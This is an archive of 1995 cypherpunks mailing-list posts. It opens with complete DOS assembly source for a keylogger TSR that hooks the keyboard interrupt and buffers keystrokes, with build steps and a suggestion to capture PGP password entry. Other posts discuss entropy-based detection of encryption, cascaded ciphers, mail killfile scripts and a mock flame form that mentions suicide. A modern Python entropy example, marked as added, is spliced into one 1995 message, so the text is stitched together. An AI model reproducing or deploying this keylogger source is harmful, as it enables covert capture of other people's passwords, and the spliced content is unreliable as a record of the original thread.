Message-ID: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


For Dos operating systems.

I wrote this in a weekend, and no longer wish to work with it.  

I will release it as is....do not ask for support, and if you know 
where I work, they have no idea I am doing this, so don't make
any assumptions about my company's software.

But, here it is, the source code for a keyboard sniffer program.

After you assemble it, link it, turn it into a .com file, and 
execute it, just hit <alt> page up for a display of the first
half of the buffer, and <alt> page down for a display of the
second half of the buffer.

Then, test it out with pgp or other dos based programs that ask
you for a password (use a fake one), and you will probably see
how insecure most of these programs are.

Mike
-----cut here----
; Keyboard sniffer TSR
;
; asm kbs.asm
; link kbs.obj
; exe2bin kbs kbs.exe
;
;Notes:  This is a keyboard sniffer program.  It is intended to
;        show how easy it is to make your computer insecure.
 
; This program hooks itself to the keyboard interrupt routine.
 
; It is not difficult to imagine a routine that simply replaced
; the keyboard interrupt routine, or simply monitored the
; keyboard buffer and pointers from another interrupt routine,
; e.g., the timer interrupt.
 
; It is also not a stretch of the imagination to say that it is
; possible that a program that monitors the keyboard buffer and
; display area for things that look like passwords (e.g., look
; for certain prompts, store next 500 characters) to either an
; unused area of the disk, or a hidden file, already exists.
 
;  That is to say, the FBI, for example, could have already
; hired some programmers to come up with a .gif viewer that
; also attaches a keyboard sniffer to your system snooping
; for passwords, in the hopes that if and when they find a
; suspected (fill-in-the-blank) "criminal", all they have
; to do is find the secret file created with their trojan TSR.
 
;
;
;
;
 
KB_INT_NUM        EQU     9     ;keyboard interrupt
BUFFER_SIZE       EQU     0b94H  ;our buffer size, 19 lines 2 buffers
 
TLC             EQU     0C9H    ;top left corner
HL              EQU     0CDH    ;horizontal line
TRC             EQU     0BBH    ;top right corner
VL              EQU     0BAH    ;vertical line
BLC             EQU     0C8H    ;bottom left corner
BRC             EQU     0BCH    ;bottom right corner
LCT             EQU     0CCH    ;left center tap
RCT             EQU     0B9H    ;right center tap
 
ALTPGUP         EQU     9900H
ALTPGDN         EQU     0A100H
 
ROM_BIOS_DATA   SEGMENT AT 40H                  ;bios statuses and kb buffer
        ORG             1AH                     ;absolute
        KB_HEAD         DW      ?               ;head of kb buffer
        KB_TAIL         DW      ?               ;tail of kb buffer
        KB_BUFFER       DW      16 DUP (?)      ;The keyboard buffer
        KB_BUFFER_END   LABEL   WORD
ROM_BIOS_DATA   ENDS
 
CODE_SEG        SEGMENT
        ASSUME  CS:CODE_SEG
        ORG     100H                          ; .com file
FIRST:  JMP     INSTALL_INTERRUPTS_MAIN
 
; data area...
 
        buffer  db      BUFFER_SIZE dup ('*')
        head    dw      5
        tail    dw      5
        cnt     dw      ?
        ind     dw      ?
        show_buff       dw      0
        lkb_tail        dw      0       ;last keyboard tail
                                        ;this is for programs that leave
                                        ;the character in bios buffer
                                        ;past one interrupt, e.g., pgp
        OLD_KB_INTERRUPT   LABEL   WORD
        OLD_KB_INTERRUPT_ADDR      DD      ?
        row     db      ?
        idstring        db      "0x5fcf9eb78a01ef28"   ;18 long
KBINTERRUPT    PROC    NEAR
        ASSUME  CS:CODE_SEG
        PUSH    AX
        PUSH    BX
        PUSH    CX
        PUSH    DX
        PUSH    DI
        PUSH    SI
        PUSH    DS
        PUSH    ES
        PUSHF
        CALL    OLD_KB_INTERRUPT_ADDR
 
        CLI
 
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX           ; point ds to ROM_BIOS_AREA...
 
        MOV     BX,KB_TAIL
        CMP     BX,KB_HEAD
        JE      nogo1           ;original keyboard interrupt has deleted char
        jmp     short go1
        mov     cx,bx
nogo1:  jmp     kbexit2    ;too far for je...
 
go1:    ;check to see if we already processed this character
        mov     cx,bx
ASSUME DS:CODE_SEG
        mov     bx,cs
        mov     ds,bx
 
        cmp     cx,lkb_tail ;is it the same as last time?
        jne     go3  ;no
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        mov     ds,bx
        jmp     kbexit2
go3:
        mov     lkb_tail,cx     ;save new tail
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        mov     ds,bx
        mov     bx,cx
 
        SUB     BX,2
        CMP     BX,OFFSET KB_BUFFER     ;did we wrap around?
        JAE     NO_WRAP                 ;no
 
        MOV     BX,OFFSET KB_BUFFER_END ;yes
        SUB     BX,2
 
NO_WRAP:MOV     DX,[BX] ;        char in DX now...
 
        CMP     DX,ALTPGUP      ;altpgup hit?
        jne     checknext1      ;no
        jmp     short   go2     ;yes, display first half of buffer
 
checknext1: CMP DX,ALTPGDN      ;altpgdn hit?
        jne     nogo2           ;no
        mov     kb_tail,bx      ;delete alt pgdn from kb_buffer
assume ds:code_seg
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        xor     bx,bx           ;garbage last tail
        mov     lkb_tail,bx
        mov     bx,offset buffer;yes, display second half of buffer
        add     bx,BUFFER_SIZE/2
        mov     show_buff,bx
        call    dump_buffer     ;dump second half
        jmp     kbexit1
 
nogo2:  jmp     save_key        ;too far for jne..
 
go2:
assume ds:rom_bios_data
        mov     cx,bx
        mov     bx,rom_bios_data
        mov     ds,bx
        mov     bx,cx
        mov     kb_tail,bx      ;delete '<alt> pgup' from kb_buffer
assume ds:code_seg
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        xor     bx,bx           ;garbage last tail
        mov     lkb_tail,bx
        mov     bx,offset buffer        ;first half buffer
        mov     show_buff,bx
        call    dump_buffer     ;dump first half
        jmp     kbexit1
 
save_key:
 
ASSUME  DS:CODE_SEG
        MOV     BX,CS
        MOV     DS,BX
 
        mov     bx,offset buffer
        add     bx,head
        mov     [bx],dl ;dh?
        inc     bx
 
        mov     cx,offset buffer
        add     cx,BUFFER_SIZE
        cmp     bx,cx           ; at end of buffer?
        jz      wrap_it         ; yes
 
        sub     bx,offset buffer
        mov     head,bx
        jmp     kbexit1
 
wrap_it:        xor bx,bx
        mov     head,bx
        jmp     kbexit1
 
kbexit1:
 
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX
kbexit2:        POP     ES
        POP     DS
        POP     SI
        POP     DI
        POP     DX
        POP     CX
        POP     BX
        POP     AX
        STI
        IRET
KBINTERRUPT    ENDP
 
dump_buffer     PROC    NEAR
ASSUME  DS:CODE_SEG
        MOV     BX,CS
        MOV     DS,BX
        STI
 
        jmp     over_data
 
        sl1     db      "                           Keyboard Sniffer Program                           ",0
        sl2     db      " Short Circuit, Inc.                  Version:  0.72 (Beta), (C)opyright 1995 ",0
 
over_data:      mov     dh,0    ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,TLC  ;top left corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     dh,0    ;row
        mov     dl,4fh  ;column = 79 dec
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,TRC  ;top right corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     dh,17h  ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,BLC  ;bottom left corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     dh,17h  ;row
        mov     dl,4fh  ;column=79 dec
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,BRC  ;bottom right corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     cx,4eh  ;78 dec
 
        mov     dh,0    ;row
        mov     dl,1    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,4eh  ; 78 characters
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
        mov     dh,3    ;row
        mov     dl,1    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,4eh  ; 78 characters
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
        mov     dh,17h  ;row
        mov     dl,1
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,4eh  ;count
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
        mov     cx,16h  ;22 lines
dline:  mov     dh,cl   ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     dx,cx   ;save cx
        mov     bh,0    ;page
        mov     cx,1    ;count
        mov     al,VL   ;vertical line
        mov     ah,0ah  ;service
        int     10h
        mov     cx,dx   ;restore cx
 
        mov     dh,cl   ;row
        mov     dl,4fh  ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     dx,cx   ;save cx
        mov     bh,0    ;page
        mov     cx,1    ;count
        mov     al,VL   ;vertical line
        mov     ah,0ah  ;service
        int     10h
        mov     cx,dx   ;restore cx
        loop    dline
 
        mov     dh, 3h  ;row
        mov     dl, 0
        mov     bh, 0   ;page
        mov     ah, 2   ;service
        int     10h     ;set cursor position
 
        mov     bh, 0   ;page
        mov     cx, 1   ;count
        mov     al,LCT  ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
 
        mov     dh, 3h  ;row
        mov     dl, 4fh ;column
        mov     bh, 0   ;page
        mov     ah, 2   ;service
        int     10h     ;set cursor position
 
        mov     bh, 0   ;page
        mov     cx, 1   ;count
        mov     al,RCT  ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
 
 
        mov     cx, BUFFER_SIZE/2 -1 ;going backwards...
        mov     ind, cx
        mov     cl, 13h
 
dorows: mov     row, cl
        mov     cx, 4eh
ll0:    mov     cnt, cx
        mov     dl, cl  ;to end of line
        ;inc     dl     ;cnt was 1 too small
        mov     dh,row
        inc     dh
        inc     dh
        inc     dh
        mov     ah,2            ;set cursor position
        mov     bh,0            ;page 0
        int     10h             ;move to 0,0
 
        mov     bx,show_buff    ;show_buff points to correct half...
        add     bx,ind          ;ind must have index, *(show_buff + ind)
        mov     al,[bx]
        mov     bh,0
        mov     cx,1
        mov     ah,0ah
        int     10h
        dec     ind             ;decrement index
        mov     cx,cnt
        loop ll0
        mov     cl,row
        dec     cl
        jnz     dorows
 
 
        mov     dh,1
        mov     dl,1
        mov     bx,offset sl1
        call    print_string
        mov     dh,2
        mov     dl,1
        mov     bx,offset sl2
        call    print_string
 
        mov     dh,18h
        mov     dl,4
        mov     bh,0
        mov     ah,2
        int     10h     ;move back to correct position
 
        ret
dump_buffer     ENDP
 
print_string    PROC    NEAR
        ;assumes ds==cs
        ;null terminated string, address in bx...
        ;row in dh
        ;col in dl
        ;uses bios int 10h, safe for tsr programs...
        jmp     over_local_ps
        sadd    dw      ?
over_local_ps:
        mov     sadd,bx
 
np:     mov     bh,0
        mov     ah,2
        int     10h
        mov     bx,sadd
        mov     al,[bx]
        cmp     al,0    ;is it 0?
        je      pse     ;yes, return
        inc     bx
        mov     sadd,bx
        inc     dl
        mov     bh,0
        mov     cx,1
        mov     ah,0ah
        int     10h
        jmp     np      ;next print (next character)
pse:    ret             ;done, encountered 0
print_string    ENDP
 
 
 
; Anything before this point stays in memory if it's okay to install...
 
 
; tests to see if kbs is already installed, returns
; zf=1 if it was already installed.
; zf=0 if it has not been previously installed.
kbia      PROC    NEAR
	;assumes ds points to code segment...
	MOV	AH, 35H 		;put old vector into es:bx
	MOV	AL,KB_INT_NUM
	INT	21H
 
        mov     si,offset idstring      ;ds:si points to our string
        mov     di,bx
        sub     di, 12h                 ;es:di points to other string?
        mov     cx,12h
        REPE    cmpsb
        ret
kbia endp
 
 
INSTALL_INTERRUPTS_MAIN       PROC    NEAR
 
ASSUME  DS:CODE_SEG
                mov     bx,cs
                mov     ds,bx
                xor     bx,bx
                mov     head,bx
                mov     tail,bx
                jmp     over_temp_data
                instg           db      "Kbs installed.",0dh,0ah,"$"
                notinstg        db      "Kbs already installed.",0dh,0ah,"$"
over_temp_data: call    kbia
                je      dont_install_it
                jmp     install_it
dont_install_it:
                mov     dx,offset notinstg
                mov     ah,09h
                int     21h
                mov     bx,cs
                mov     es,bx
                int     20h
 
install_it:     MOV     AH, 35H                 ;put old vector into es:bx
                MOV     AL,KB_INT_NUM
                INT     21H
 
                MOV     OLD_KB_INTERRUPT,BX
                MOV     OLD_KB_INTERRUPT[2],ES
 
                MOV     AH,25H                  ;set new keyboard interrupt
                LEA     DX,KBINTERRUPT
                INT     21H
 
                mov     dx,offset instg
                mov     ah,09h
                int     21h
 
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX
        mov     cx,KB_TAIL
 
ASSUME  DS:CODE_SEG
        MOV     BX,CS
        MOV     DS,BX
        mov     lkb_tail,cx
 
 
        MOV     DX, offset kbia         ;ds:dx end of stay resident
        INT     27H                     ;allocate and stay resident
 
INSTALL_INTERRUPTS_MAIN       ENDP
 
 
CODE_SEG        ENDS
 
        END     FIRST
 
; P.S.  I haven't programmed in asm in a long time, no fair flaming
;me for poor programming style/inefficient code.
; Use this code at your own risk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 11 Jan 95 22:00:26 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <ab3a75370402100421a8@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 01/12/95, Dale Harrison (AEGIS) wrote:
>Won't work!  You can always embed an encrypted message in what 'looks'
>like plaintext.  A trivial example: Encrypt a message with a caesar
>cypher, then build a story where the first char of each word maps to
>each subsequent char from the encrypted text.  At the cost of expanding
>the size of the message by a factor of 5 to 10 you've hidden the
>encrypted message in what looks like a letter to your mother (or a news
>story in the NY Times, etc.)  This is old technique.

The context this was being discussed in, was trying to make _plaintext_
look like _ciphertext_. The operator of a data haven or remailer might
hypothetically want to ensure that all text he dealt with was encrypted.
So your method wouldn't do anything in that area.  Unless you can think of
a way to embed plaintext in ciphertext in such a way that it looks like
ciphertext, and my guess is that any method that did that well would be
sufficiently obscure as to be analogous to encryption for our purposes.
Really bad encryption, with very little point, but still hidden text. Which
is the real point, the operator doesn't want to deal with any text that
isn't "hidden" in some way.

Of course, we're not just dealing with text.  So the scheme has got to be
changed a bit so as to be able to detect unencrypted GIFs, and mu-law
files, and as yet to be determined unknown files.  I don't know enough
about what's being talked about to know if this entropy detecting stuff
will generalize to non text files. Cause we want to catch unencrypted GIFs
too.  [And doesn't compression alone do similar things to the entropy as
encryption does, anyhow? If someone compresses their file with a good
compression algorithm, as I understand it the non-randomness left will be
pretty low. But it won't meet the needs we're discussing, I don't think.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Wed, 11 Jan 95 23:05:03 PST
To: marko@millcomm.com
Subject: RE: How do I know if its encrypted?
Message-ID: <0098A541.0A71B0E0.1313@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Check the entropy?
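
The entropy check suggested here, together with the question in the preceding message about whether compression alone looks the same, as an added example that is not part of either original post. The 7.0 bits/byte threshold, the function names and all sample data are assumptions constructed for illustration; uniform random bytes stand in for the output of a good cipher.

```python
import base64
import math
import random
import zlib
from collections import Counter

THRESHOLD = 7.0  # bits per byte; assumed cut-off for "looks encrypted"


def byte_entropy(data: bytes) -> float:
    """Shannon entropy of the byte histogram, in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def passes_gate(data: bytes, threshold: float = THRESHOLD) -> bool:
    """Hypothetical operator policy: accept only input that looks random."""
    return byte_entropy(data) >= threshold


def constructed_samples(seed: int = 1995) -> dict:
    """Build labelled inputs; every one of them is constructed for this example."""
    rng = random.Random(seed)
    vocab = (
        "the operator of a data haven or remailer might want to ensure that "
        "all text he dealt with was encrypted so every message is measured "
        "before it is stored or forwarded and readable mail is refused"
    ).split()
    plaintext = " ".join(rng.choice(vocab) for _ in range(40000)).encode("ascii")
    # Stand-in for ciphertext: good cipher output is modelled as uniform bytes.
    ciphertext = bytes(rng.getrandbits(8) for _ in range(65536))
    return {
        "plaintext": plaintext,
        "compressed plaintext": zlib.compress(plaintext, 9),
        "ciphertext": ciphertext,
        # ASCII armor (base64) uses 64 symbols, so it tops out near 6 bits/byte.
        "armored ciphertext": base64.b64encode(ciphertext),
    }


def survey(samples=None) -> dict:
    """Return {name: (entropy in bits/byte, accepted by the gate)}."""
    samples = constructed_samples() if samples is None else samples
    return {
        name: (round(byte_entropy(data), 3), passes_gate(data))
        for name, data in samples.items()
    }


if __name__ == "__main__":
    for name, (bits, accepted) in survey().items():
        verdict = "accept" if accepted else "reject"
        print(f"{name:22s} {bits:5.3f} bits/byte  {verdict}")
```

The gate accepts unencrypted compressed data and rejects armored ciphertext, so a byte-entropy threshold measures randomness of the encoding, not whether the content is hidden; armor has to be stripped before measuring, and compression has to be ruled out by other means such as format headers.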




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 22:02:54 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <199501120607.BAA19021@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501120502.VAA29808@largo.remailer.net>,
Eric Hughes <eric@remailer.net> wrote:
>   From: cactus@seabsd.hks.net (L. Todd Masco)
>
>   I'm wondering: would the strength be increased by using a randomly selected
>   symmetric cypher? 
>
>Strength is not the right aspect.  Global risk is reduced, simply because
>the aggregate cost of a breach is reduced.

Isn't it?  If an attacker does not know what cipher is used and breaking
each is computationally expensive (though not prohibitively so) doesn't
that add extra complexity?  IE, if cipher A, B, and C are attackable in
large but not prohibitive time, wouldn't an attacker have to spend more
cycles to break something that was randomly one of those?  I agree that
it's not a significantly large jump, but if an attacker has to go through
all the possibilities for A, B, before breaking something in C, it seems
that there's a small increase in strength (Not being argumentative,
really... I understand that this increase in strength isn't enough to
warrant any significant effort.  Just want to clarify the answer in
my mind).

>But selecting a single cipher is just as much a fixed policy as a
>randomly selected one is.  Far better to let the user pick a policy,
>both about sent and accepted ciphers.

Sure.  Ideally, a user could say "use A" or "use randomly A, C, or D" or
even "use A_x(C_x) or B_x(D_y)".   I'm not certain the "accept" is a great
idea, but what the hell... any theoretical general system should have
support for such a decision to be made, right?  As failure modes
multiply...

>   I guess this reduces to: do strong cyphers have "signatures" of some sort,
>   by which the type of encryption can be derived? 
>
>If they do, they're likely not _strong_ ciphers.

Great... that's the answer I was looking for, and what my gut feeling
was.  I'm trying to determine how much rope is too much for a first pass.

Related: is there, in general or in any known specific cases, any loss of
security in using sym. cipher A on ciphertext B (of another sym. cipher) with
the same key?  With different keys (I would think not, but I vaguely
remember mention of something here long ago)?
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxSMSBNhgovrPB7dAQECKQP/fqXwOcRmH6Z5dm8fsDnFzkCNyy5bc7Os
+/hWmyjlk6/qx2Ym0gvlIZaxMSVR68E1qQUaoiAaWY7SatskU8o6dZRI+SmON4NV
qSZnBh/+TnQwcTK0c0N+4m3Y8GhIk0ERX9modZfadv15Q07yfP7MXEj4yRQOse6e
WHmUg0WOhW4=
=GedZ
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxTHISoZzwIn1bdtAQEUbAGAuX+ALOTHZkUd8vqsWzVZWKSKwnJ+03yW
alp18VGBGaM4PLQWU0OAFmbBP8wUxBEz
=U5tO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Wed, 11 Jan 95 22:19:35 PST
To: cypherpunks@toad.com
Subject: Reefer madness
In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com>
Message-ID: <m0rSIt6-0002GZC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Seems to me I have seen something like this cybersmut hype
before... wasn't it called 'Reefer Madness'?

Craig



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 23:53:00 PST
To: tcmay@netcom.com
Subject: Re: How do I know if its encrypted? (fwd)
Message-ID: <Pine.3.89.9501120118.B3416-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



T.C. May, so eloquently  waxed:

The squeals of the net.cops were impressive to behold! Demands to
Netcom that I be expelled from the Net, that the "Child Welfare
Agents" would soon be breaking down my doors, etc. 

Nobody spotted the message. After several days, I "let the truth be
told," which of course enraged others. 

I thought this digression might be amusing to some.

--Tim May

Did they write the standard "ticket"?

form319.2(1/95)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 * * * * *  N O T I C E   O F   N E T I Q U E T T E   B R E A C H  * * * * *

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NOTICE: IT HAS COME TO OUR ATTENTION THAT YOU HAVE POSTED 
          SOMETHING THAT HAS BEEN CONSIDERED WORSE THAN:

         ___ a Rush Limbaugh quote.
         ___ a Newt Gingrich joke.
         ___ a reference to Beavis & Butthead.
         _X_ lame ASCII graphic(s) (Choose all that apply):
             ___ USS Enterprise
             _X_ Australia
             ___ The Amiga logo
             ___ Company logo
                 (Mark only if above also)
                 ___ and you stated that you don't speak for your employer.
             ___ Bicycle
             ___ Bart Simpson

Furthermore:

_x_ You have greatly misunderstood the purpose of ___the.news.group___
						        (newsgroup)
_x_ You have greatly misunderstood the purpose of the net.
_x_ You are a loser.
___ You must have spent your entire life in a skinner box to be this
    clueless.
_x_ *plonk*
_x_ This has been pointed out to you before. (see prior form)
_x_ It is recommended that you:
    (Mark all that apply)
    _x_ stick to FidoNet and come back when you've grown up.
    _x_ find a volcano and throw yourself in.
    ___ get a gun and shoot yourself.
    _x_ stop reading Usenet news and get a life.
    ___ stop sending email and get a life.
    ___ consume excrement.
    ___ consume excrement and thus expire.

Additional comments:

My apologies to all responsible users who have had to view this horrible,
lousy, lame, excuse for writing.  I certainly hope this person gets their 
butt thrown in jail, but I'll settle for having their net access 
permanently revoked.

' . . . and thus ex

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO EVERY INTERNET NEWSGROUP NEAR YOU! . . . . . CENSORED.COM
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Thu, 12 Jan 95 00:32:22 PST
To: cypherpunks@toad.com
Subject: Data Havens..A consumer perspective
Message-ID: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



1. You have what I want or need.
2. In order for me to let you store it, I will give it to you
   anyway you wish to get it.
3. I will let you do anything to the data you wish, so long as I  
   get it back intact.
4. It is no concern (only idle curiosity maybe) where the data is parked.
5. I would expect to pay money for the safekeeping of my data.
6. I would expect the longer you hold the data, the more it will cost.
7. The only thing I am counting on is the data's timely retrieval.
8. Welcome to the world of data "coatchecking".

Why make it more complex than this?
From the moment the data leaves their hands, until I return it,
they have no right, nor I no obligation, to divulge anything about it.
For they already would know, it would take a few minutes to retrieve it.

For whether it's encrypted to the nth degree, or parked in a plain brown
wrapper in a massive unix box somewhere, as long as I the haven manager,
return the data in a safe, timely, uncorrupted manner, I've done my duty.

Love Always,

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Thu, 12 Jan 95 01:23:31 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: keyboard sniffer TSR source code...
In-Reply-To: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <Pine.3.89.9501120308.G3416-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm sure that as many people are now silently testing it,
and that they are a bit busy at the moment,
I think they'd register their thanks if they could.

Love Always,

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Thu, 12 Jan 95 04:02:58 PST
To: cypherpunks@toad.com
Subject: mail killfiling
Message-ID: <199501121202.EAA03835@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text



There was some talk on the list earlier about reading the list through
news so as to be able to use kill files.  Here is an alternate way for
folks that have 'deliver' installed on their system as the local mail
agent.  (do a "grep Mlocal /etc/sendmail.cf" to see...if you don't
see 'deliver' in there somewhere, you don't.  This is provided you are
using sendmail, of course.)

First, install the following as ".deliver" in your home dir:

--- cut here ---

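#!/bin/sh
# delivers all mail except that from folks in $NOMAIL

NOMAIL=.nomail
FROM=`header -f From "$HEADER"`

# -F matches the From: text as a fixed string rather than a regular
# expression; the -n test stops an empty From: from matching every line
if [ -n "$FROM" ] && grep -F -- "$FROM" "$NOMAIL" >/dev/null 2>/dev/null

then        # we don't want any mail from this person!
      exit         
fi

echo "$1"  # otherwise, deliver as usual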

--- cut here ---

Now, you also need this little script that I call "killem" installed
in your home dir.

--- cut here ---

#!/bin/sh
# appends the From: line of the message read on stdin to the kill list
NOMAIL=.nomail
header -f From >> "$NOMAIL"

--- cut here ---

Now, let's say you are in your mailbox and you see such a horrible
piece of mail from someone that you never want to see any mail from
them again. ;)  Provided you are using 'elm', (probably is a mechanism for
this on other readers.)  just pipe the message through 'killem' with
a "|" from elm and answer "killem" when asked what you want to pipe
the message through.  The From: line will be stripped and stuck
in .nomail (or whatever you change it to) and you won't see any more
mail from this person.  Of course, this is not entirely true: mail
that does not get delivered will go to a file called Undel.mail in
your home dir, which you can keep, or have a cron job deal with, or
whatever you like.  Also, if they change their 'real name' on 
their system, you'll start to get mail from them again.  (i.e.
w/'chfn' or the like.)  

This is just a quick hack I whipped up a moment ago, and could of 
course be improved/changed.  'deliver' will also run perl scripts,
and it should be relatively easy to write something that way that
will handle wildcarding and field selection.  An automated mailing
to folks upon their 'termination' could be added for those that
want to rub it in, or an automated bounce that sends mail right
back with a note that their mail is not being received.

If you want to block mail based just upon the account name and not
have to worry about them changing their "real" name, you can just add
the account name to .nomail manually.  Judicious use of the unix 'cut'
command could have 'killem' just toss the account name into .nomail for
mail coming from unixy systems, but would fail for others, so I decided
to not assume anything about the From: line.  Ought to work fine
and transparently for most folks as-is.  Ingenious folks can build
on it.

I dunno how many systems use 'deliver', but it's sort of a Linux
(slackware) default, and those using it can avoid learning procmail
with this script.

Enjoy,
Craig.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Parsons <parsons@bga.com>
Date: Thu, 12 Jan 95 03:52:29 PST
To: cypherpunks@toad.com
Subject: Re: CBS/C.Chung Plan Hit Job on Internet? (fwd)
Message-ID: <Pine.3.89.9501120547.A11756-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 11 Jan 1995 07:32:03 -0800 (PST)
From: Skip Leuschner <skipl@pacifier.com>
Subject: Re: CBS/C.Chung Plan Hit Job on Internet?

I see C.Chung's program as one of the first volleys in a new phase of a 
TV/print media project.

Internet and talk radio emerged as political forces in the '94 
election.  If political influence by the media is a zero-sum game, as I 
believe it is, then the TV and print media must look to their own 
